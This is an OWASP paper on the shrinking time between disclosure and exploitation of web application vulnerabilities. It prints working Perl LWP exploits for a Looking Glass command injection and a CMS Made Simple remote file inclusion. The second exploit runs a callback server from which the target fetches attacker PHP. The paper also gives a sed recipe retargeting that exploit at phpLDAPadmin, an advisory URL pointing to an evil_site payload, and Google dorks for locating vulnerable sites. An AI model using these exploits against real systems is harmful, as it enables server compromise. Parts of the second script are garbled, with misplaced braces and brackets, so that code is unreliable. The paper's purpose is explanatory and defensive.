A6 Web application patching: a losing race

advertisement
Expanding Exposure: The
Decreasing Time Between
Web Application Vulnerability
and Exploitation
Author: Charles Miller
charlesamiller@hotmail.com
OWASP Papers Program
Table of Contents
A1
A2
A3
A4
A5
A6
Abstract .................................................................................................................................................................................... 1
Introduction .............................................................................................................................................................................. 1
Perl-LWP .................................................................................................................................................................................. 1
Example 1: Looking Glass Remote Command Execution Vulnerabillity .............................................................................. 2
Example 2: CMS Made Simple Lang.PHP Remote File Include Vulnerability .................................................................... 3
Web application patching: a losing race ................................................................................................................................. 4
A6.1 Patching a vulnerable installation ................................................................................................................................ 5
A6.2 Attacking vulnerable installations................................................................................................................................. 5
A7 Conclusion ............................................................................................................................................................................... 6
A8 References ............................................................................................................................................................................... 6
A9 About the Author ...................................................................................................................................................................... 7
OWASP Papers Program
A1 Abstract
Vulnerabilities in web applications continue to be the most frequently discovered security problem. This article illustrates how
an attacker can take a vulnerability and quickly produce a functional exploit using the Perl LWP module. It demonstrates the
process on two recently announced vulnerabilities. Finally, based on this knowledge, it addresses the question of how
quickly administrators must patch systems after a new web application vulnerability is announced.
A2 Introduction
Web applications have become ubiquitous throughout the Internet. They underly most e-commerce and provide functionality
used everyday including secure file transfers, web-based emails, etc. Web applications manage and have access to some of
the most sensitive information available including social security numbers, credit reports, on-line banking accounts, health
insurance information, etc. Despite the fact web applications have access to this sensitive information, their security is
usually not sufficient as evidenced by almost daily announcements on forums such as Bugtraq [1].
There are many reasons why web applications can be the easiest route for an attacker to infiltrate a host or network. Many
sources have examined the pervasive insecurity of current web applications [2][3][4][5], but most agree that the reasons
include:

Ease of access. Web applications are typically allowed through firewalls as they operate over the web.

Inexperienced programmers. Web application programmers may not have the security experience that other
programmers possess.

Easy to analyze. Normally, source code is available and vulnerabilities can be located simply by “grep-ing” for
known types of problems.

Architecture independent. Generally, no shell code or other architecture specific information is required.

Ease of targeting. Search engines such as Google can be used to find vulnerable hosts.

Ease of exploitation. This paper will illustrate just how easy it is to exploit some common types of web application
vulnerabilities.
Some web application vulnerabilities can be exploited simply by using a web browser. Others are more complicated and
require some level of sophistication. This article mostly addresses web applications written in scripting languages, which are
typically easier to exploit. In order to illustrate web application exploitation, this article illustrates Perl's LWP, a general
purpose API for performing web queries.
A3 Perl-LWP
The Library for WWW in Perl (LWP) is a set of modules that allow programmers easy access to www-related routines. Plenty
of documentation for LWP exists, including web pages such as “Web Basics with LWP: Sample Recipes for Common Tasks”
[6] and books such as Sean Burke's “Perl & LWP” [7]. LWP has the capacity to make GET or POST requests, handle basic
HTTP authentication, store and send cookies, etc. It is a wonderful mechanism to automate web-based tasks such as writing
simple web crawling robots or stress testing web applications. Additionally, it can handle both secured and unsecured sites.
In this article, only the most basic aspects of LWP are demonstrated. The Perl code provided in this article is intended to be
demonstrative only, and does not attempt to be robust or follow best practices in coding style. Furthermore, while the speed
and ease of development of web exploits in Perl is illustrated in this article, the same could certainly be done in other
languages, notably Python and PHP.
1
OWASP Papers Program
A4 Example 1: Looking Glass Remote Command Execution Vulnerabillity
A vulnerability was announced on August 29th 2005 in the Looking Glass package [8] and was assigned Bugtraq ID 14682
[9]. This package is not widely used throughout the Internet, however, a quick Google search turned up 81 vulnerable sites
at the time of this writing.
http://www.google.com/search?q=%22Looking+Glass%22+inurl%3Alg.php
At this time, there is no official patch or workaround suggested for this product. However, this is mitigated by the fact that
commands to be executed can not contain any whitespace, minimizing the potential impact of exploitation. (There may be a
way to still execute arbitrary commands by embedding them in HTTP headers).
The vulnerability exists because a variable, $target, is passed as an argument to a function being executed within the perl
“system” call. This variable is not properly sanitized, and as a result meta-characters such “|” may be used. Thus, arbitrary
commands may be executed via command injection. The relevant code from lg.php can be seen below. Notice the failed
use of the escapeshellcmd function.
if ( $_POST["func"] AND $_POST["target"] ) {
...
$target=preg_split("/[\s,;]/",$_POST["target"]);
$target=$target[0];
...
switch ( $_POST["func"] ) {
...
case "dnsns":
$com="/usr/bin/host -Q -t NS";
...
}
...
$com=escapeshellcmd($com);
...
system("$com ".$target." 2>&1");
By examining the lg.php file, it becomes clear that in order to exploit the vulnerability, one has to set the variable $func to
dnsns, $ipv to ipv4, and the variable $target is sent to the perl “system” function. See below for LWP code which exploits this
vulnerability. This code is very simple, but illustrates the low level of effort and expertise needed to write an exploit for this
type of vulnerability.
#!/usr/bin/perl
use LWP 5.64;
# Read command line arguments
my $hostname = shift(@ARGV);
my $command = shift(@ARGV);
# Initialize user agent.
my $browser = LWP::UserAgent->new;
$browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
# The URL we want to hit
my $url = "http://$hostname/LookingGlass/lg.php";
# The HTTP Post variables
my $response = $browser->post( $url,[
'func' => 'dnsns',
'ipv' => 'ipv4',
'target' => "|$command"]);
# Print out HTTP status code, should be 200
2
OWASP Papers Program
my $code = $response->status_line;
print "received $code\n";
# Grab out the results of the command execution and print
$response->content =~ /pre>(.*)<\/pre/s;
print "$1\n";
As an example of the usage of this script, consider:
> ./lg.pl localhost pwd
received 200 OK
/srv/www/htdocs/LookingGlass
A5 Example 2: CMS Made Simple Lang.PHP Remote File Include
Vulnerability
Another common type of web application vulnerability is based on the ability of the PHP language to include remote files. If
an “include” or “require” call is made which depends on variables controlled by the user, it may be possible for an attacker to
include arbitrary php code which will be executed by the web server. On August 31, 2005, such a vulnerability was
announced in CMS Made Simple [10] on Bugtraq with ID 14709 [11]. This vulnerability can only be exploited with
register_globals set to “on”. This should never be done on production systems. CMS Made Simple has since released a
new version addressing this issue [12]. At the time of this writing, there are over 11,000 sites on the Internet using this
application, hopefully they have upgraded their version of this product or have proper settings in their php.ini files.
http://www.google.com/search?q=%22powered+by+cms+made+simple%22
The relevant portion of the vulnerable code from lang.php follows:
foreach ($nls['file'][$current_language] as $onefile)
{
include($onefile);
}
If an attacker controls the variable $nls, they will gain control of the variable $onefile. They can then set this variable to point
to a remote file on the attacker's server. The php code provided by the attacker will then be executed when included. A
simple exploit using Perl's LWP and Socket modules is provided.
#!/usr/bin/perl
use LWP 5.64;
use IO::Socket;
(my $hostname, my $target, my $command) = @ARGV;
# Initialize socket for callback
my $sock = new IO::Socket::INET (
LocalHost => "$hostname",
LocalPort => '8080',
Proto => 'tcp',
Listen => 1,
Reuse => 1,
);
die "Could not create socket: $!\n" unless $sock;
if (my $pid = fork){
my $new_sock = $sock->accept();
my $request = <$new_sock>;
# Pretend we're a web server returning a small php script
3
OWASP Papers Program
}
print $new_sock "HTTP/1.1 200 OK\n";
print $new_sock "Content-Length: $content_length\n";
print $new_sock "Content-Type: text/plain\n\n";
print $new_sock "<? print `$command` ?>\n";
close $new_sock;
exit;
my $browser = LWP::UserAgent->new;
$browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
]
my $url = "http://$target/cmsmadesimple-0.10/admin/lang.php";
my $response = $browser->post( $url,
[
'change_cms_lang' => 'vx',
'CMS_ADMIN_PAGE' => '1',
'nls[file][vx][vxsfx]' => "http://$hostname:8080/blah.php"
);
die "Received invalid response type", $response->content_type
unless $response->content_type eq 'text/html';
print $response->content;
An example of the use of this exploit is
> ./cmsmadesimple.pl localhost localhost "pwd"
/srv/www/htdocs/cmsmadesimple-0.10/admin
It should be noted, that a necessary requirement for his exploit to succeed is for the vulnerable web server to be able to
initiate a connection to the attacking computer. Various firewall configurations may prevent this from occurring. An attacker
will try various common ports, besides the port 8080 used in the above script.
A6 Web application patching: a losing race
The time between vulnerability announcement and exploitation has been decreasing for several years [13][14]. However,
while most traditional exploits require a minimum amount of time to develop, web applications are unique in that some web
application exploits can be produced in seconds, as will be seen below. Additionally, unlike traditional exploits where
extensive scanning may be necessary to locate vulnerable servers, locating vulnerable web applications can be done almost
instantly [15].
While articles have previously illustrated the decreasing time between vulnerability announcement and exploitation through
case study [16], the most interesting being [17], it is still illustrative to consider this question specifically for web applications
given the context of the rest of this article. So in light of the simplicity demonstrated in writing some web application exploits,
the amount of time necessary to patch or attack a newly discovered web application will be illustrated by way of an example.
On Fri Aug 29 09:35PM 2005 UTC, a researcher named retrogod posted a vulnerability on the Bugtraq mailing list
concerning phpLDAPadmin 0.9.6 [18]. It would eventually obtain Bugtraq ID 14695 [19]. An edited version of the posting
appears below:
4
OWASP Papers Program
phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure,
remote code execution, cross site scripting
software:
author site: http://phpldapadmin.sourceforge.net/
description: phpLDAPadmin is a web-based LDAP client. It provides easy,
anywhere-accessible, multi-language administration for your LDAP server
...
a user can also execute arbitrary php code and system commands:
http://[target][path]/phpldapadmin/welcome.php?custom_welcome_page=http:
//[evil_site]/cmd.gif
...
googledork: phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php
At this point the race is on between attacker and defender.
A6.1 Patching a vulnerable installation
The CVS page at Sourceforge indicates that the vulnerable file welcome.php was updated in CVS at Wed Aug 31 13:42
2005 UTC [20]. The patched alpha version was released shortly thereafter at Wed Aug 31 13:56 2005 UTC [21]. The next
stable version was released Sept 25 2005 [22]. While it is possible a system administrator could edit the vulnerable php file,
its fair to say that a typical system administrator would have had to wait at least 36 hours in order to obtain the latest release
by the publisher. Depending on the application and the site, it may be possible for the administrator to remove access to the
application until an updated version is released. At this point the administrator would have to install, configure, and test the
new release. Unfortunately, many system administrators are probably still unaware of this vulnerability due to the lack of a
centralized update mechanism with web applications.
A6.2 Attacking vulnerable installations
On the other hand, the typical ingredients needed by the attacker are targeting data and technical exploitation details.
Namely, how do they locate vulnerable installations and what variables lead to the compromise. In this case, both
requirements are obtained in the advisory. Normally, targeting information is not included in the advisory, and must be
obtained by downloading and examining the source code of the application.
Using the supplied Google search terms, over a hundred web sites are still identified at the time of this writing. Probably
more were available at the time of disclosure.
At this point, all that remains is for the attacker to construct an exploit from an existing template, in this case the exploit used
previously for the CMS Made Simple vulnerability. Since most web application vulnerabilities fall into a small set of categories
[22], it is fair to assume a skilled attacker will possess templates for all such categories. First, the vulnerable variable is
replaced and then the path to the vulnerable script is changed.
> cat cmsmadesimple.pl | sed 's/nls\[file\]\[vx\]\[vxsfx\]/custom_welcome_page/' > temp
> cat temp | sed 's/cmsmadesimple-0.10\/admin\/lang.php/phpldapadmin-0.9.6c\/welcome.php/' > phpldap.pl
Finally, the attack is launched.
> ./phpldap.pl localhost localhost id
[ ... a bunch of html output ... ] uid=30(wwwrun) gid=8(www) groups=8(www)
It is difficult to imagine a scenario in which the administrator wins this race, especially considering the release did not occur
during business hours and the attacker can be ready to attack in a matter of minutes.
5
OWASP Papers Program
A7 Conclusion
This article illustrated how simple exploits can be written against web application vulnerabilities by using Perl's LWP modules.
Two recent examples in perl and php web applications were discussed, one with command injection and the other with
remote file inclusion vulnerabilities. Using LWP, functional exploits were provided. Finally, it was demonstrated that it is
virtually impossible for administrators to effectively manage the patch levels of their web applications since writing exploits
can be accomplished in a matter of seconds. In essence, with web applications, anything less than zero exposure can lead
to a compromise.
A8 References
[1] Bugtraq, http://www.securityfocus.com/archive/1
[2] C. van der Walt, Assessing Internet Security Risk, Part 4: Custom Web Applications, securityfocus.com, 10/2002,
http://online.securityfocus.com/infocus/1631
[3] P. Wood, Web Application Hacking: Exposing Your Backend, net-security.org, 11/2003, http://www.netsecurity.org/article.php?id=599
[4] J. Melbourne, D. Jorm, Penetration Testing for Web Applications (Part One), securityfocus.com, 6/2003,
http://www.securityfocus.com/infocus/1704
[5] K. Raina, Trends in Web Application Security, securityfocus.com, 10/2004, http://www.securityfocus.com/infocus/1809
[6] S. Burke, Web Basics with LWP: Sample Recipes for Common Tasks, perl.com, 8/2002
http://www.perl.com/pub/a/2002/08/20/perlandlwp.html
[7] S. Burke, Perl & LWP, O'Reilly ISBN: 0-596-00178-9, 6/2002, http://www.oreilly.com/catalog/perllwp/index.html
[8] Looking Glass website, http://de-neef.net/articles.php?id=2&page=1
[9] Looking Glass Remote Command Execution Vulnerability, securityfocus.com, 8/2005,
http://www.securityfocus.com/bid/14682
[10] CMS Made Simple website, http://www.cmsmadesimple.org/
[11] CMS Made Simple Lang.PHP Remote File Include Vulnerability, securityfocus.com, 8/2005,
http://www.securityfocus.com/bid/14709
[12] CMS Made Simple 0.10.1 Released! Please upgrade!, CMS Made Simple
http://www.cmsmadesimple.org/moduleinterface.php?module=News&id=cntnt01&cntnt01action=detail&cntnt01articleid=40&
cntnt01returnid=1
[13] B. Schneier, Closing the Window of Exposure: Reflections on the Future of Security, securityfocus.com, 2000,
http://www.securityfocus.com/templates/forum_message.html?forum=2&head=3384&id=3384
[14] Patch Now, Not Later, 9/2005, symantec.com,
http://www.symantec.com/smallbiz/library/patch_now.html
[15] http://johnny.ihackstuff.com
[16] W. Argaugh, W. Fithen, J. McHugh, Windows of Vulnerability: A Case Study Analysis, computer.org, 12/2000
6
OWASP Papers Program
http://csdl2.computer.org/persagen/DLAbsToc.jsp?resourcePath=/dl/mags/co/&toc=comp/mags/co/2000/12/rztoc.xml&DOI=
10.1109/2.889093
[17] SABRE BinDiff vs. MS05-025 Demonstration, www.sabre-security.com, http://www.sabresecurity.com/products/flash_bindiff_png.html
[18] retrogod, phpLDAPadmin 0.9.6 – 0.9.7/apaha5 (possibly prior versions) system disclosure, securityfocus.com, 8/2005,
http://www.securityfocus.com/archive/1/409624
[19] PHPLDAPAdmin Welcome.PHP Multiple Vulnerabilities, securityfocus.com, 8/2005,
http://www.securityfocus.com/bid/14695/info
[20] cvs: phpldapadmin/phpldapadmin/welcome.php, phpldapadmin.sourceforge.net,
http://cvs.sourceforge.net/viewcvs.py/phpldapadmin/phpldapadmin/welcome.php?rev=1.21&view=markup
[21] phpLDAPadmin Development, phpldapadmin.sourceforge.net, http://phpldapadmin.sourceforge.net/developers.php
[22] phpLDAPadmin Development, phpldapadmin.sourceforge.net,
http://phpldapadmin.sourceforge.net/developers.php
[23] The Ten Most Critical Web Application Security Vulnerabilities, 1/2004, owasp.org
http://umn.dl.sourceforge.net/sourceforge/owasp/OWASPTopTen2004.pdf
A9 About the Author
Charles Miller is a Senior Security Architect at a financial services organization in Saint Louis, Missouri. Previously, he was
employed by the National Security Agency for five years where he was an application security researcher. He holds a PhD
from the University of Notre Dame and is a CISSP.
7
Download